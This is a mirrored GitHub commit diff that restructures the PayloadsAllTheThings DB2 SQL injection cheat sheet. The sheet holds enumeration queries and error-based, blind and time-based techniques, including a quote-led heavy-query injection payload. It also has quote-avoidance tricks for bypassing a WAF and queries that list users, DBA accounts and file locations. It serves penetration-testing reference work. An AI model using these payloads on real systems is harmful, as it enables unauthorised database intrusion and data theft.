mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-04 18:40:41 +00:00
DB2 Injection updates
This commit is contained in:
Swissky
parent
3c5bab0338
commit
b98f8ca587
1 changed files with 95 additions and 171 deletions
|
|
@ -5,203 +5,127 @@
|
|||
|
||||
## Summary
|
||||
|
||||
* [DB2 Cheatsheet](#db2-cheatsheet)
|
||||
* [DB2 Comments](#db2-comments)
|
||||
* [DB2 Default Databases](#db2-default-databases)
|
||||
* [DB2 Enumeration](#db2-enumeration)
|
||||
* [DB2 Methodology](#db2-methodology)
|
||||
* [DB2 Error Based](#db2-error-based)
|
||||
* [DB2 Blind Based](#db2-blind-based)
|
||||
* [DB2 Time Based](#db2-time-based)
|
||||
* [DB2 WAF Bypass](#db2-waf-bypass)
|
||||
* [DB2 Accounts and Privileges](#db2-accounts-and-privileges)
|
||||
* [References](#references)
|
||||
|
||||
|
||||
## DB2 Cheatsheet
|
||||
## DB2 Comments
|
||||
|
||||
### Version
|
||||
| Type | Description |
|
||||
| -------------------------- | --------------------------------- |
|
||||
| `--` | SQL comment |
|
||||
|
||||
|
||||
## DB2 Default Databases
|
||||
|
||||
| Name | Description |
|
||||
| ----------- | --------------------------------------------------------------------- |
|
||||
| SYSIBM | Core system catalog tables storing metadata for database objects. |
|
||||
| SYSCAT | User-friendly views for accessing metadata in the SYSIBM tables. |
|
||||
| SYSSTAT | Statistics tables used by the DB2 optimizer for query optimization. |
|
||||
| SYSPUBLIC | Metadata about objects available to all users (granted to PUBLIC). |
|
||||
| SYSIBMADM | Administrative views for monitoring and managing the database system. |
|
||||
| SYSTOOLs | Tools, utilities, and auxiliary objects provided for database administration and troubleshooting. |
|
||||
|
||||
|
||||
## DB2 Enumeration
|
||||
|
||||
| Description | SQL Query |
|
||||
| ---------------- | ----------------------------------------- |
|
||||
| DBMS version | `select versionnumber, version_timestamp from sysibm.sysversions;` |
|
||||
| DBMS version | `select service_level from table(sysproc.env_get_inst_info()) as instanceinfo` |
|
||||
| DBMS version | `select getvariable('sysibm.version') from sysibm.sysdummy1` |
|
||||
| DBMS version | `select prod_release,installed_prod_fullname from table(sysproc.env_get_prod_info()) as productinfo` |
|
||||
| DBMS version | `select service_level,bld_level from sysibmadm.env_inst_info` |
|
||||
| Current user | `select user from sysibm.sysdummy1` |
|
||||
| Current user | `select session_user from sysibm.sysdummy1` |
|
||||
| Current user | `select system_user from sysibm.sysdummy1` |
|
||||
| Current database | `select current server from sysibm.sysdummy1` |
|
||||
| OS info | `select os_name,os_version,os_release,host_name from sysibmadm.env_sys_info` |
|
||||
|
||||
|
||||
## DB2 Methodology
|
||||
|
||||
|
||||
| Description | SQL Query |
|
||||
| ---------------- | ------------------------------------ |
|
||||
| List databases | `SELECT distinct(table_catalog) FROM sysibm.tables` |
|
||||
| List databases | `SELECT schemaname FROM syscat.schemata;` |
|
||||
| List columns | `SELECT name, tbname, coltype FROM sysibm.syscolumns` |
|
||||
| List tables | `SELECT table_name FROM sysibm.tables` |
|
||||
| List tables | `SELECT name FROM sysibm.systables` |
|
||||
| List tables | `SELECT tbname FROM sysibm.syscolumns WHERE name='username'` |
|
||||
|
||||
|
||||
## DB2 Error Based
|
||||
|
||||
```sql
|
||||
select versionnumber, version_timestamp from sysibm.sysversions;
|
||||
select service_level from table(sysproc.env_get_inst_info()) as instanceinfo
|
||||
select getvariable('sysibm.version') from sysibm.sysdummy1 -- (v8+)
|
||||
select prod_release,installed_prod_fullname from table(sysproc.env_get_prod_info()) as productinfo
|
||||
select service_level,bld_level from sysibmadm.env_inst_info
|
||||
```
|
||||
-- Returns all in one xml-formatted string
|
||||
select xmlagg(xmlrow(table_schema)) from sysibm.tables
|
||||
|
||||
### Comments
|
||||
-- Same but without repeated elements
|
||||
select xmlagg(xmlrow(table_schema)) from (select distinct(table_schema) from sysibm.tables)
|
||||
|
||||
```sql
|
||||
select blah from foo -- comment like this (double dash)
|
||||
```
|
||||
|
||||
### Current User
|
||||
|
||||
```sql
|
||||
select user from sysibm.sysdummy1
|
||||
select session_user from sysibm.sysdummy1
|
||||
select system_user from sysibm.sysdummy1
|
||||
```
|
||||
|
||||
### List Users
|
||||
|
||||
DB2 uses OS accounts
|
||||
|
||||
```sql
|
||||
select distinct(authid) from sysibmadm.privileges -- priv required
|
||||
select grantee from syscat.dbauth -- incomplete results
|
||||
select distinct(definer) from syscat.schemata -- more accurate
|
||||
select distinct(grantee) from sysibm.systabauth -- same as previous
|
||||
```
|
||||
|
||||
### List Privileges
|
||||
|
||||
```sql
|
||||
select * from syscat.tabauth -- shows priv on tables
|
||||
select * from syscat.tabauth where grantee = current user -- shows privs for current user
|
||||
select * from syscat.dbauth where grantee = current user;;
|
||||
select * from SYSIBM.SYSUSERAUTH — List db2 system privilegies
|
||||
```
|
||||
|
||||
### List DBA Accounts
|
||||
|
||||
```sql
|
||||
select distinct(grantee) from sysibm.systabauth where CONTROLAUTH='Y'
|
||||
select name from SYSIBM.SYSUSERAUTH where SYSADMAUTH = ‘Y’ or SYSADMAUTH = ‘G’
|
||||
```
|
||||
|
||||
### Current Database
|
||||
|
||||
```sql
|
||||
select current server from sysibm.sysdummy1
|
||||
```
|
||||
|
||||
### List Databases
|
||||
|
||||
```sql
|
||||
select distinct(table_catalog) from sysibm.tables
|
||||
SELECT schemaname FROM syscat.schemata;
|
||||
```
|
||||
|
||||
### List Columns
|
||||
|
||||
```sql
|
||||
select name, tbname, coltype from sysibm.syscolumns -- also valid syscat and sysstat
|
||||
```
|
||||
|
||||
### List Tables
|
||||
|
||||
```sql
|
||||
select table_name from sysibm.tables
|
||||
select name from sysibm.systables
|
||||
```
|
||||
|
||||
### Find Tables From Column Name
|
||||
|
||||
```sql
|
||||
select tbname from sysibm.syscolumns where name='username'
|
||||
```
|
||||
|
||||
### Select Nth Row
|
||||
|
||||
```sql
|
||||
select name from (select * from sysibm.systables order by name asc fetch first N rows only) order by name desc fetch first row only
|
||||
```
|
||||
|
||||
### Select Nth Char
|
||||
|
||||
```sql
|
||||
select substr('abc',2,1) FROM sysibm.sysdummy1 -- returns b
|
||||
```
|
||||
|
||||
### Bitwise AND/OR/NOT/XOR
|
||||
|
||||
```sql
|
||||
select bitand(1,0) from sysibm.sysdummy1 -- returns 0. Also available bitandnot, bitor, bitxor, bitnot
|
||||
```
|
||||
|
||||
### ASCII Value
|
||||
|
||||
```sql
|
||||
Char select chr(65) from sysibm.sysdummy1 -- returns 'A'
|
||||
```
|
||||
|
||||
### Char -> ASCII Value
|
||||
|
||||
```sql
|
||||
select ascii('A') from sysibm.sysdummy1 -- returns 65
|
||||
```
|
||||
|
||||
### Casting
|
||||
|
||||
```sql
|
||||
select cast('123' as integer) from sysibm.sysdummy1
|
||||
select cast(1 as char) from sysibm.sysdummy1
|
||||
```
|
||||
|
||||
### String Concat
|
||||
|
||||
```sql
|
||||
select 'a' concat 'b' concat 'c' from sysibm.sysdummy1 -- returns 'abc'
|
||||
select 'a' || 'b' from sysibm.sysdummy1 -- returns 'ab'
|
||||
-- Returns all in one xml-formatted string.
|
||||
-- May need CAST(xml2clob(… AS varchar(500)) to display the result.
|
||||
select xml2clob(xmelement(name t, table_schema)) from sysibm.tables
|
||||
```
|
||||
|
||||
|
||||
### IF Statement
|
||||
Seems only allowed in stored procedures. Use case logic instead.
|
||||
## DB2 Blind Based
|
||||
|
||||
### Case Statement
|
||||
|
||||
```sql
|
||||
select CASE WHEN (1=1) THEN 'AAAAAAAAAA' ELSE 'BBBBBBBBBB' END from sysibm.sysdummy1
|
||||
```
|
||||
| Description | SQL Query |
|
||||
| ---------------- | ------------------------------------------ |
|
||||
| Substring | `select substr('abc',2,1) FROM sysibm.sysdummy1` |
|
||||
| ASCII value | `select chr(65) from sysibm.sysdummy1` |
|
||||
| CHAR to ASCII | `select ascii('A') from sysibm.sysdummy1` |
|
||||
| Select Nth Row | `select name from (select * from sysibm.systables order by name asc fetch first N rows only) order by name desc fetch first row only` |
|
||||
| Bitwise AND | `select bitand(1,0) from sysibm.sysdummy1` |
|
||||
| Bitwise AND NOT | `select bitandnot(1,0) from sysibm.sysdummy1` |
|
||||
| Bitwise OR | `select bitor(1,0) from sysibm.sysdummy1` |
|
||||
| Bitwise XOR | `select bitxor(1,0) from sysibm.sysdummy1` |
|
||||
| Bitwise NOT | `select bitnot(1,0) from sysibm.sysdummy1` |
|
||||
|
||||
|
||||
### Avoiding Quotes
|
||||
## DB2 Time Based
|
||||
|
||||
```sql
|
||||
SELECT chr(65)||chr(68)||chr(82)||chr(73) FROM sysibm.sysdummy1 -- returns “ADRI”. Works without select too
|
||||
```
|
||||
Heavy queries, if user starts with ascii 68 ('D'), the heavy query will be executed, delaying the response.
|
||||
|
||||
### Time Delay
|
||||
|
||||
Heavy queries, for example: If user starts with ascii 68 ('D'), the heavy query will be executed, delaying the response.
|
||||
However, if user doesn't start with ascii 68, the heavy query won't execute and thus the response will be faster.
|
||||
```sql
|
||||
' and (SELECT count(*) from sysibm.columns t1, sysibm.columns t2, sysibm.columns t3)>0 and (select ascii(substr(user,1,1)) from sysibm.sysdummy1)=68
|
||||
```
|
||||
|
||||
### Serialize to XML (for error based)
|
||||
|
||||
## DB2 WAF Bypass
|
||||
|
||||
### Avoiding Quotes
|
||||
|
||||
```sql
|
||||
select xmlagg(xmlrow(table_schema)) from sysibm.tables -- returns all in one xml-formatted string
|
||||
select xmlagg(xmlrow(table_schema)) from (select distinct(table_schema) from sysibm.tables) -- Same but without repeated elements
|
||||
select xml2clob(xmelement(name t, table_schema)) from sysibm.tables -- returns all in one xml-formatted string (v8). May need CAST(xml2clob(… AS varchar(500)) to display the result.
|
||||
SELECT chr(65)||chr(68)||chr(82)||chr(73) FROM sysibm.sysdummy1
|
||||
```
|
||||
|
||||
### Command Execution and Local File Access
|
||||
|
||||
Seems it's only allowed from procedures or UDFs.
|
||||
## DB2 Accounts and Privileges
|
||||
|
||||
### Hostname/IP and OS INFO
|
||||
|
||||
```sql
|
||||
select os_name,os_version,os_release,host_name from sysibmadm.env_sys_info -- requires priv
|
||||
```
|
||||
|
||||
### Location of DB Files
|
||||
|
||||
```sql
|
||||
select * from sysibmadm.reg_variables where reg_var_name='DB2PATH' -- requires priv
|
||||
```
|
||||
|
||||
### System Config
|
||||
|
||||
```sql
|
||||
select dbpartitionnum, name, value from sysibmadm.dbcfg where name like 'auto_%' -- Requires priv. Retrieve the automatic maintenance settings in the database configuration that are stored in memory for all database partitions.
|
||||
select name, deferred_value, dbpartitionnum from sysibmadm.dbcfg -- Requires priv. Retrieve all the database configuration parameters values stored on disk for all database partitions.
|
||||
```
|
||||
|
||||
### Default System Database
|
||||
|
||||
* SYSIBM
|
||||
* SYSCAT
|
||||
* SYSSTAT
|
||||
* SYSPUBLIC
|
||||
* SYSIBMADM
|
||||
* SYSTOOLs
|
||||
| Description | SQL Query |
|
||||
| ---------------- | ------------------------------------ |
|
||||
| List users | `select distinct(grantee) from sysibm.systabauth` |
|
||||
| List users | `select distinct(definer) from syscat.schemata` |
|
||||
| List users | `select distinct(authid) from sysibmadm.privileges` |
|
||||
| List users | `select grantee from syscat.dbauth` |
|
||||
| List privileges | `select * from syscat.tabauth` |
|
||||
| List privileges | `select * from SYSIBM.SYSUSERAUTH — List db2 system privilegies` |
|
||||
| List DBA accounts | `select distinct(grantee) from sysibm.systabauth where CONTROLAUTH='Y'` |
|
||||
| List DBA accounts | `select name from SYSIBM.SYSUSERAUTH where SYSADMAUTH = 'Y' or SYSADMAUTH = 'G'` |
|
||||
| Location of DB files | `select * from sysibmadm.reg_variables where reg_var_name='DB2PATH'` |
|
||||
|
||||
|
||||
## References
|
||||
|
|
|
|||
Loading…
Reference in a new issue